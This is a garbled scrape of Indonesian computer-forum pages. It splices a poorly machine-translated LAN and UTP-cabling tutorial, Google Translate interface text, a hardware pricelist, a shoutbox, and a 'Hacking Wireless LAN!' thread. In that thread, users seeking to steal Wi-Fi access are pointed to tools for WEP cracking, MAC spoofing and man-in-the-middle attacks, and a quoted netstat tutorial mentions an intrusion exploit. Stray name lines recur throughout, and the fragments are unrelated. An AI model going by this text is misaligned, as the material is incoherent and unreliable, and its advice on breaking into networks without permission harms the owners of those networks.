<br>c4m4r2006 <br>kawoem <br> <br> <br> <br> <br>Join Date: Apr 2006 <br>Location:
Jakarta <br>Posts: 166 <br>Thanks: 0 <br>Thanked 14 Times in 7 Posts <br> <br>
<br>-------------------------------------------------- ------------------------------ <br> <br>Quote:
<br>Originally Posted by AlisBandung <br>@ Acheh <br>it bothered ya make nambahin picture
here, so males are also euy .. hhe <br> <br>@ Muiz <br>pc router and installing UTP ya ...
<br>tomorrow we continued ya ... <br> <br>@ Shinosuke <br>sip deh, but before the WLAN,
we&#39;ll eat it aja dulu ya .. <br> <br>continued much .... <br> <br>yesterday we&#39;ve
ngebahas ama topologinya cable, now we&#39;ll discuss one implementation, the LAN <br>
<br>ni era as the development, we not only know doang LAN, but now there&#39;ve WLAN,
Wireless LANs ie, the wireless LAN (simplenya so). <br> <br>Local Area Network (LAN) is the
number of computers that are connected together in one particular area that is not so large, as in an
office or building. <br> <br>In communications, there are two types of network or LAN, a network
of Peer to Peer and Client-Server networks. <br> <br>In peer to peer network, every computer
connected to the network can act both as a workstation or server. Whereas the client-server
networks, only one computer that served as servers and other computers acting as workstations.
Between the two types of networks <br>these each have advantages and weaknesses, we&#39;ll
discuss ntar lebuh far <br> <br>outlined, LAN was supported by 2 main components, namely:
<br>1. Physical Kompenen as a PC, the NIC (Network Interface Card), cable and topologinya
<br>2. Kompenen software like the operating system, Network Adapter Driver and network
protocols themselves <br> <br>fuck the hell tu lis? <br>let&#39;s discuss satu2 aja .. <br> <br>PC
<br>dear, gak banget deh discuss our problems pake PC today, but we will discuss a working PC in
the network aja. <br>Type personal computers used in the network will greatly determine the
performance of the network. Computers with high performance will be able to send and access data
in the network quickly. <br>Tissue type in the Client-Server, a computer that functioned as an
absolute server must have a performance higher than the computers <br>others as his workstation,
because the server will be responsible for providing facilities and <br>managing the network
operations <br> <br>NIC <br>Based on the type of buses, there are several types of network
interface card (nic) or network card, which is the ISA and PCI. <br>We have kind of network cards
that are widely used, the PCI <br>for more details, see aja LAN Card-Sodara Sodara home .. not on
board like a brow, hhe .. <br> <br>cable and network topology <br>aja look at previous posts <br>
<br>NAD <br>instead we Naggroe ya, but Network Adapter Card. Each network card will have a
driver or program that serves to activate and configure the network adapter is adapted to the
environment in which network cards are installed to be used for data communication. <br>
<br>operating systems <br>OS here is not like Windows and Linux, but OS peer to peer and
Client / Server. discussed satu2 ... <br> <br>1. Client-Server Network <br>-------------------------
<br>Servers are computers that provide facilities for other computers in the network and client are
the computers that receive or use the facilities provided by the server. Dijaringan Server client-
server type is called the Dedicated Server for purely acting as servers that provide facilities to
workstations and servers can not serve as workstation. <br> <br>Advantages <br>1. Higher access
speeds due to the provision of network facilities and management carried out exclusively by a
single computer (server) that is not burdened with other tasks as a workstation. <br>2. Security
systems and network administration is better, because there was a user who served as a network
administrator, who manages the administration and security systems <br>network. <br>3. Data
backup system is better, because on a client-server network is centered on the backup server, which
will backup all the data used in the network. <br> <br>Weakness <br>1. Operational costs are
relatively more expensive. <br>2. Required a special computer that is more capable for the assigned
<br>as a server. <br>3. Continuity of the network depends on the server. If the server is susceptible
to interference, then the whole network will be disrupted. <br> <br> <br>2. Peer To Peer Network
<br>-------------------------- <br>When viewed from the role of both types of servers in the network,
the network server in a peer to peer type is termed non-dedicated server, because the server does not
act as a pure server but at the same time can serve as workstation. (lha?) <br> <br>Advantages
<br>1. Between computers in a network can share each owned facilities such as: hard disk, drive,
fax / modem, printer. <br>2. Operational costs are relatively cheap compared to the type of client-
server network, one <br>only because it does not require any server that has a special ability to
organize and provide network facilities. <br>3. Continuity of the network work does not depend on
a single server. So that if one computer / peer dead or damaged, the entire network will not be
susceptible to interference. <br> <br>Weakness <br>1. Network troubleshooting is relatively more
difficult, because the network of peer to peer type of each computer it is possible to engage in
communication that exists. In client-server network, the communication is between the server with
the workstation. <br>2. Lower performance compared to client-server network, because every
computer / peer in addition to managing the use of network facilities also need to manage their own
job or application. <br>3. Network security system is determined
by each user to manage the security of each facility owned. <br>4. Because the network data is
spread on each computer in the network, the backups should be performed by each computer. <br>
<br>(tired euy, mending copies aja ya?) <br> <br>nah, it was a glimpse of the LAN,
because&#39;ve most, let me not bored, we udahin first, we discuss about the ntar protokol2nya
and other hardware that supports LAN and teman2 request .. <br> <br>(&quot;_&quot;) <br>
<br>occasionally making workshop donk ........... <br>__________________ <br> <br>
<br>&quot;No Wealth Beyond Reason&quot; <br>&quot;No Poverty Exceeding Folly&quot;
<br>&quot;No legacy Exceed Budi Pekerti&quot; <br>&quot;Not Exceed Consulting&#39;s
Helper&quot; <br> <br>Email: Muammarsubki@yahoo.com <br> <br>Website:
http://www.subki.orgfree.com <br> <br> <br>c4m4r2006 <br>View Public Profile <br>Send a
private message to c4m4r2006 <br>Find More Posts by c4m4r2006 <br> <br> 12-23-2006, 11:28
PM # 18 <br>journalists jh <br>Imum Mukim <br> <br> <br> <br> <br>Join Date: Nov 2006
<br>Location: d / h AlisBandung <br>Posts: 2.246 <br>Thanks: 3 <br>Thanked 18 Times in 9
Posts <br> <br> <br> <br>-------------------------------------------------- ------------------------------
<br> <br>wah workshop? eyebrows in bandung nih <br>__________________ <br>Master the
world with information <br> <br>My Blog <br>My Friendster <br>My Facebook <br> <br>
<br>journalists jh <br>View Public Profile <br>Send a private message to journalists jh <br>Find
More Posts by journalists jh <br> <br> 12-27-2006, 02:50 PM # 19 <br>Muiz <br>Peutua <br>
<br> <br>Join Date: Dec 2006 <br>Posts: 752 <br>Thanks: 0 <br>Thanked 5 Times in 2 Posts
<br> <br> <br>-------------------------------------------------- ------------------------------ <br>
<br>Quote: <br>Originally Posted by AlisBandung <br>--------------------- <br> <br>jadi gini, UTP
cable (there are 8 colored wires) that do have standards, so that in each country that use uniformity
in the implementation pnya, well until now known UTP eyebrows, there used 2 yag standards,
namely: <br> <br>1. Standard T568-A <br> <br>Pin Color <br>-------------------- <br>White and 1
hijo <br>2 hijo <br>3 white-orange <br>4 Blue <br>5 white and blue <br>6 Orange <br>7 white
and brown <br>8 brown <br> <br>2. T568-B standard <br> <br>Pin Color <br>--------------------
<br>White and 1 orange <br>2 Orange <br>3 white and hijo <br>4 Blue <br>5 white and blue
<br>6 hijo <br>7 white and brown <br>8 brown <br> <br>Ntar 2 standard is used when the cable
is used for straight, rollover, or crossover, gini explanation: <br> <br>Straight-Through
<br>================= <br>This type of cable used to connect the workstation with the hub /
switch. This cable also has 4 pairs (8 wire) where each pin between the one end with the other end
must be the same. That is, if one end using a standard T568-A will end only had to wear T568-A as
well. And vice versa, if one end using a standard T568-B, the other end must also use the same
standard. <br> <br>Rollover <br>======== <br>Used for connection between a workstation to
the console port on a router or switch. Standard used is T568-A on one end and <br>the other end
of the sequence T568-A stay in roll (reversed). Likewise, if used <br> <br> <br>

Bahasa yang tersedia untuk penerjemahan:

Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania

adenan harjono agung


haris nurul mugiroh haris
nina tito
Rusia
Serb
Sloven
Slowakia
Spanyol
Suomi
Swahili
Swensk Thai
Turki
Ukraina
Vietnam
Wales
Yiddi
Yunani

©2010 Google - Matikan terjemahan seketika - Kebijakan Privasi - BantuanSedang


diterjemahkan…
Web Gambar Maps Buku Terjemahan Blog Gmail selengkapnya ▼Direktori

Kalender

Foto

Documents

Site

Grup
Bantuan

Penerjemahan

Penelusuran Diterjemahkan

Translator Toolkit

Alat dan Sumber Daya

Menerjemahkan teks, laman web, dan dokumen

Masukkan teks atau URL laman web, atau unggah dokumen.


Masukkan teks atau URL laman web, atau unggah dokumen.
Home Forum Help Arcade Calendar Shop LIVE CHAT GoogleTagged Login Register
button

Masukan Untuk Pejabat-pejabat Forum HYPERMEDIA


You are not allowed to view links.
Register or Login
click here and post

The Unordinary
Masukkan istilah pencarian Anda
Web hyem.org
Kirim formulir pencarian

You are not allowed to view images.


Please register or login

Welcome, Guest. Please login or register.


March 06, 2010, 05:55:13 AM
1 Hour 1 Day 1 Week 1 Month Forever
Login with username, password and session length
Pricelist Update !!
PRICELIST UPDATE => You are not allowed to view links.
Register or Login (last update 2009 Okt 21)

HYPER Xitro Dragon-3D Design AP1


Phenom II X4 From X2 Deneb, DFI LP DK 790FXB-M2RS,Palit HD 4850, OCZ Gold Edition 2 x
1GB, WDC 500 GB 16 MB, ATX + Enhance 400W True
PROMO : Rp. 4.978.765,-

HYPER Xitro Dragon-Fire AP1


KUMA Athlon X2 7750+, abit AX78 AMD 770 / SB600 CrossFire OTES Dragon Platform, Saphire
HD4830/HD4770, OCZ Gold Ed 2x2G 8500 CL5, WDC 320 GB 16 MB, FOXCONN Case+PSU
PROMO : Rp. 4.498.765,-
BEST SELLER...!!!!

HYPER XITRO Designer AP2


Core2Quad Q8400,DFI LP Junior GF9400-T2RS Hybrid SLI, OCZ Fatality Edition 2X2G, WDC
500 GB 16 MB, FOXCONN Case+PSU True (Graph DESIGNER PC)
PROMO : Rp. 4.454.545,-

HYPER Xitro TOXIC-Dragon ACF


Phenom II X4 from 550BE, DFI LP BI 785G-M35 CrossFireX Dragon Platform, Palit HD4830
256bit, DDR3 OCZ Fatality Edition 2X2G, WDC 500 GB, Enhance 400W True + (FREE
VENDETA II for fist buyer everyday)
PROMO : Rp. 4.976.543,-

HYPER Xitro Epix-Dragon


Athlon II X2 @ 3.5Ghz from sargas 140 + BIOSTAR TA785GE 128 CF, Palit HD4650 Super
512MB 128bit, DDR2 2X1G, WDC 160GB 16 MB, ATX 400W
PROMO : Rp. 2.525.252,-

| LCD 15.6"+Key+Mouse = Rp. 950rb | LCD 19"+Key+Laser Mouse = Rp.1.300rb | LCD


16"+Key+Mouse= Rp. 990rb |

PALIT HD4870
PALIT HD4870 Sonic Dual Edition DDR5, 512MB, 256bit 775/4000 Dual OC Speed (dalam
beberapa hal grafis 256bit ini masih lbh unggul dr 5770 128bit, apalagi kalo kita lihat dari
price/performancenya)
PROMO : $150

PALIT HD4850
PALIT HD4830 DDR3, 512MB, 256bit, Core:575/ Mem:1800Mhz + HDMI
Adik termuda dari keluarga RV770, Still be the Price/Performance KING!
PROMO : $90

PALIT HD3850 Super DDR3


RV 670, 256 MB DDR3, 256bit, 670MHZ, 1660MHZ, 319

Dgn DDR3, Kartu High-end legendaris ini adalah

adenan harjono agung


haris nurul mugiroh haris
nina tito
High-end display Card dibawah $100, khusus bagi yg suka OC.. This babe is the Most Value King!
PROMO:$78, 512M:$65

ALL AVAILAVBE

Chat Now!

[more]
Last 20 Shouts:
--------------------------------------------------------------------------------

Panji
Today at 01:44:28 AM
Selamat buat Hendy hyem.. ganyangka lu menang bro..
an35
Today at 12:50:18 AM
ayo kita kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
sepi mas dab...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do yang"an :p
B.U.G.S
Yesterday at 05:05:04 PM
@Tito Haga
kan iso nge-move tp ga nggo redirection, dadi ga metu MOVED.. MOVED.. ngunu marai MOMED
wae.. wakakaka..
coolwin
Yesterday at 04:58:26 PM
CEK UPDATE BEST KILL hari ini CF!!!!! SAYA DI PERINGKAT 2 WAKAKAKAKAKA
Tito Haga
Yesterday at 02:51:11 PM
@BUGS
hahahaha...sori2..bar tangi turu ngemoved ya ngono kui...haha
donkey
Yesterday at 01:57:41 PM
wakakakaka....
blackshield™
Yesterday at 11:54:06 AM
cilukkkkkkkk
baaaaaaa...
B.U.G.S
Yesterday at 10:39:35 AM
buset, isine kok ming moved kabeh kie..? nek nge-move topik lawas mending ga usah dikei
redirection kang..
Tito Haga
Yesterday at 08:26:27 AM
wakakakakka...senasib berati
sadnux
Yesterday at 08:20:42 AM
bukan soal bersih2 nya, tp itu lho tulisan yg di sign yg soal kuliah
ortu sering ngomong kek gitu kl pas marahin ane T_T
Tito Haga
Yesterday at 08:13:04 AM
Hahahahaha...maap2 ya...kesalahan teknis tadi le bersih2...jadi ngemovednya salah kamr jugah ::
sadnux
Yesterday at 08:09:47 AM
pagi yg indah..tp langsung ketendang sama signaturenya pak dito
wakakakak
Tito Haga
Yesterday at 07:56:09 AM
pagi kang
sadnux
Yesterday at 07:47:53 AM
met pagi semua
Tito Haga
Yesterday at 06:34:29 AM
weh...kang panji onlen
Panji
Yesterday at 06:13:51 AM
miss u all...
Tito Haga
Yesterday at 05:30:56 AM
Ndalu geng

Show last 200

Polling
Lates Post
Beli fingerboard dimana y... by vheebhee [Today at 03:46:23 AM]
Mo Tanya Lagi Niy.. Boleh... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
TOLONG PENJELASAN MENGENA... by botaxalim [Today at 01:54:06 AM]
Update 5 Maret 2010 Cross... by botaxalim [Today at 01:36:16 AM]
[ASK] Membangun Jaringan by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot... by Hazzan [Today at 12:24:06 AM]
guitar hero pc maen pake ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Karya 3D Buatan An... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie unru... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] Intel 915GAV Tit 3x... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 AM]
Sesuaikan DDR3 anda...!!! by masYogo [Yesterday at 05:18:00 AM]
[review] HaPe Modem "smar... by frozr_man [Yesterday at 05:08:18 AM]
AMD VS INTEL < FIGHT ! > by didit_catro' [Yesterday at 04:15:54 AM]
[Ask About] Garansi proci... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] Cara mbungkam Fan b... by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Adu Kreativitas Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10884
Latest: Ricko
Stats
Total Posts: 102876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP

http://www3.clustrmaps.com/counter/maps.php?url=http://www.hyem.org Hot NEWS


The Unordinary Community > Forum > == S O F T W A R E== > Security (Moderator: Light) >
Hacking Wireless LAN !
Pages: [1] Go Down « previous next »
Print

Author Topic: Hacking Wireless LAN ! (Read 6005 times)

berang_berang
Trade Count: (0)
[ POWERED ]

Posting Quality: 0
Offline

Last Login:May 24, 2006, 10:28:54 AM


Posts: 57
HY$0.00 credits

View Inventory
Send Money to berang_berang
Topic starter

Hacking Wireless LAN !


« on: March 09, 2006, 01:07:46 PM »

--------------------------------------------------------------------------------
Kalo kita mau hack w.LAN tools2 standard apa yg kita butuhin, dan caranya gmana ?

Gmana cara masuk dan gmana cara bobolnya ?

Trus kalo pake linux tools yg disarankan apa ? kalo windows apa ?
Kalo mau nyolong koneksi internet gmana ?

adenan harjono agung


haris nurul mugiroh haris
nina tito
Logged
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #1 on: March 13, 2006, 01:02:12 PM »

--------------------------------------------------------------------------------
netstumbler & kismet buat nyari AP atau SSID yg aktif & airsnort buat ngecrack passwordnya...
manual instalasinya & tutorialnya googling aja. Kalo berhasil jgn lupa share passwordnya...........

Logged

The Unordinary Community Re: Hacking Wireless LAN !


« Reply #1: March 13, 2006, 01:02:12 PM »

--------------------------------------------------------------------------------

Logged

RooTrick
[ Community Member ]
Trade Count: (0)
[ POWERED ]

Posting Quality: 0
Offline

Last Login:September 10, 2009, 11:04:13 AM


Posts: 93
HY$36.00 credits

View Inventory
Send Money to RooTrick

Re: Hacking Wireless LAN !


« Reply #2 on: March 19, 2006, 08:13:19 PM »

--------------------------------------------------------------------------------
tuh download dmn om?
trus kalo uda dapet source code na bikin aplikasi na gmn???
thx bgt...
:mrgreen:

Logged
--------------------------------------------------------------------------------
Let the world revolves around me...

densinyo
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 0
Offline

Last Login:February 28, 2010, 12:54:59 AM


Posts: 133
HY$353.00 credits

View Inventory
Send Money to densinyo

-=-peduli lingkungan mulai dari diri sendiri-=-

Re: Hacking Wireless LAN !


« Reply #3 on: March 20, 2006, 08:15:01 PM »

--------------------------------------------------------------------------------
DL dmn tuh...boleh dong minta linknya...

Logged

--------------------------------------------------------------------------------
T-Force 550 ! Athlon64 X2 4000+ ! Adata 2gb ! Acbel 400w ! WDC 500gb ! DVD RW Pioneer !
DVD Lite-On ! A4Tech
-=-peduli lingkungan mulai dari diri sendiri-=-
081-5612-7812

You are not allowed to view links.


Register or Login
You are not allowed to view images.
Please register or login

The Unordinary Community Re: Hacking Wireless LAN !


« Reply #3: March 20, 2006, 08:15:01 PM »

--------------------------------------------------------------------------------

Logged
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #4 on: March 21, 2006, 03:09:47 PM »

--------------------------------------------------------------------------------
Aku lg ada proyek nih,bikin antena kaleng buat nembak WiFinya YKPN, ada yg pernah punya
pengalaman ga bkin antena kaleng?
Cari alat n bahannya ada yg tau ga?
Ini ada sdikit tutorialnya kalo pd berminat :
You are not allowed to view links.
Register or Login

Logged

MAS
[OprekPC]
Trade Count: (0)
[ POWERED ]

Posting Quality: 0
Offline

Last Login:April 19, 2008, 06:18:17 PM


Posts: 57
HY$221.00 credits

View Inventory
Send Money to MAS

Re: Hacking Wireless LAN !


« Reply #5 on: August 16, 2006, 02:28:36 AM »

--------------------------------------------------------------------------------
ikuti ini aja deh... You are not allowed to view links.
Register or Login sdh terlalu tua Linux nya (sbb Auditor sdh susah carinya n dah diganti Backtrack)
tp yakin deh,klo anda mampu mengimplementasikan,wuiiih m

adenan harjono agung


haris nurul mugiroh haris
nina tito
udah banged.

satu hal lagi....pemilihan chipset wifi jg jd pertimbangan.bisa diliat disini

You are not allowed to view links.


Register or Login

klo utk windows,selain netstumbler pake aja WDRIVER dan AirSnort.jamin isa (klo cuman make
WEP) tp klo targetnya dah make MAC auth ya nyerah deh mas...hehehehe,lum ada yg isa

Logged

--------------------------------------------------------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Modifikasi - Tweak - Overclock PC

You are not allowed to view links.


Register or Login
WarungPlus

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline

Last Login:September 20, 2008, 02:39:26 PM


Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #6 on: December 13, 2006, 01:58:02 PM »

--------------------------------------------------------------------------------
gini bro, aku kan di kampus pake fasilitas internet.tp pake via pc yang terhubung via LAN. trus
waktu ta' liat ternyata dalam jaringan itu ada juga laptop2 yang terkoneksi via wifi. aku liatnya pake
cmd, trus ta' ketik "net view" keluar tu laptop2nya. bisa ta' hack gak dari pc yang aku pake?
thanks ya...(just curious, don't wanna harm everybody)

Logged

psyCHo_L061c
Trade Count: (0)

Posting Quality: 0
Offline

Last Login:January 09, 2007, 09:24:31 AM


Posts: 2
HY$0.00 credits

View Inventory
Send Money to psyCHo_L061c

Re: Hacking Wireless LAN !


« Reply #7 on: January 08, 2007, 04:52:37 PM »

--------------------------------------------------------------------------------
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie

Logged

still_ndESo
NBP
[ Community Member ]
Trade Count: (1)
[ HYPER ]

Posting Quality: 8
Offline

Last Login:September 20, 2008, 02:39:26 PM


Posts: 1103
HY$444.00 credits

View Inventory
Send Money to still_ndESo
No Body's Perfect

Re: Hacking Wireless LAN !


« Reply #8 on: January 26, 2007, 08:04:29 PM »

--------------------------------------------------------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om.....hehehehe itu mah gampang, asal u udah bisa dan taw gimana cara fingerprinting and
foot printingnya oms
trus kita cari taw bug or security holes nya ada apa ja disana gitu,,,......hehehehehehe i am just
newbie

wah, mbok saya diajarin mas...lha kan saya masih dibawahnya newbie
hehee

Logged

The Unordinary Community Re: Hacking Wireless LAN !


« Reply #8: January 26, 2007, 08:04:29 PM »

--------------------------------------------------------------------------------

Order : hyem_toko

Logged

silverx
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 1
Offline

Last Login:June 18, 2008, 02:50:14 PM


Posts: 121
HY$120.00 credits

View Inventory
Send Money to silverx

Nikmatilah Hidup Ini......

Re: Hacking Wireless LAN !


« Reply #9 on: March 17, 2007, 11:41:56 AM »
--------------------------------------------------------------------------------
tools ini bisa sangant berguna untuk browsing sema yang masuk sebuah jaringan, Cain And Abel
cari lewat google aj.... pasti dapat, install dan jalankan, disitu anda bisa membuka kompi-kompi
yang adapada jaringan, meskipun worgroupnya berbeda...........................
aku bingung buat antena yang ada tutorinya diatas, konek ke PCnya ake port apaan??? pake serial?
ato pake USB?? kan ditutorial cuman antenanya doang!!!!!!!!!!!1

Logged

--------------------------------------------------------------------------------
"Milikilah Sesuatu Menurut Kebutuhan, Bukan menurut Keinginan"....

arwan
Trade Count: (0)
Interest..

Posting Quality: -1
Offline

Last Login:June 11, 2007, 11:16:42 PM


Posts: 11
HY$4.00 credits

View Inventory
Send Money to arwan

never ending learning

Re: Hacking Wireless LAN !


« Reply #10 on: April 07, 2007, 06:23:01 AM »

--------------------------------------------------------------------------------
Netstumbler, Kismet,dan Aeroneet/aeropeek

its stuf...
kalo make kismet kan bisa keliatan mac address nya kalo dia ga aktif bisa kita manfaatkan dengan
mengganti MAC address kita... atau anda mau mencoba "man in the middle"?

aeropeek bisa membuka WEP AP entah kalo WPA... (belum nyoba)


biasanya ASCII yang dienkripsi jadi kita cari kesamaannya saja... dan mungkin bisa dibagi 4 atao
semacamnya biar ketemu ASCII codenya...
ini juga bisa dimanfaatkan untuk man in the middle
mufti-
att

agung ack

kalo ada yang punya aeropeek softwarenya mbo aku dibagi... software ku rusak kena jeefo, dan itu
adalah masternya.... kalo download lagi males (trial)

cmiiw
adenan harjono agung
haris nurul mugiroh haris
nina tito
Logged

--------------------------------------------------------------------------------
i have my own journey

lelahana
Trade Count: (0)

Posting Quality: 0
Offline

Last Login:November 10, 2007, 04:43:39 PM


Posts: 4
HY$1.00 credits

View Inventory
Send Money to lelahana

Re: Hacking Wireless LAN !


« Reply #11 on: April 09, 2007, 04:05:09 PM »

--------------------------------------------------------------------------------
sadisssssss....
kckckckckckc....wah semuanyajago pisan..
tapi kalo minta diajarin caranya,ada yang mau ga?
jadi pengen nih...penasaran buanget....tapi ga tau caranya...
ajarin dunks.. :'( :'( :'( :'( :'( :'(

Logged

arbangun
GAmeRZ, COdeR & CArding
Trade Count: (0)
[ Enthusiast ]

Posting Quality: 2
Offline

Last Login:October 19, 2009, 02:03:55 PM


Posts: 130
HY$40.00 credits

View Inventory
Send Money to arbangun

aRB'S Coorp

Re: Hacking Wireless LAN !


« Reply #12 on: April 13, 2007, 12:52:50 PM »

--------------------------------------------------------------------------------
NUAMBAAAHHIIINN...waaakaaakaa .....

coba pake APSniffer


trus ethereal ( wireshark )
ama APsnort

pake tu tool, klo ga slh kita bisa dpet pass ama username buat log-on.

hmmm nih ada lagi buat deteksi penyusup komputer bisa jg dicoba pake cara ini nih

Quote
== MENDITEKSI PENYUSUP JARINGAN LEWAT DOS ==

BEGIN

*PENGANTAR:Mungkin kita tidak sadar kalau kita main diwarnet bahwa ternyata ada
yang sedang memantau kita baik itu adminya atau memang orang iseng yang mau
mencuri informasi dari kita , maka dengan itu saya akan sedikit mencoba melihat
atau mendetiksinya hanya denga dos command !

Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.


-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*

sebelah nama pc itu adalah port yang digunakan untuk hubungan .


netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp .
Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita
atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba
menyusup ke komputer orang lain dengan
mufti-
mengu

agung
dan aku udah dapat menyusup.
nakan kaht2 :d

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State


TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*
Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada
port yang dibuka kaht2 untuk menge sploit suatu komputer .
lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang
menyusup ke komputer kita . Gunakan nbtstat -a
C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status


---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~ME..........<00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
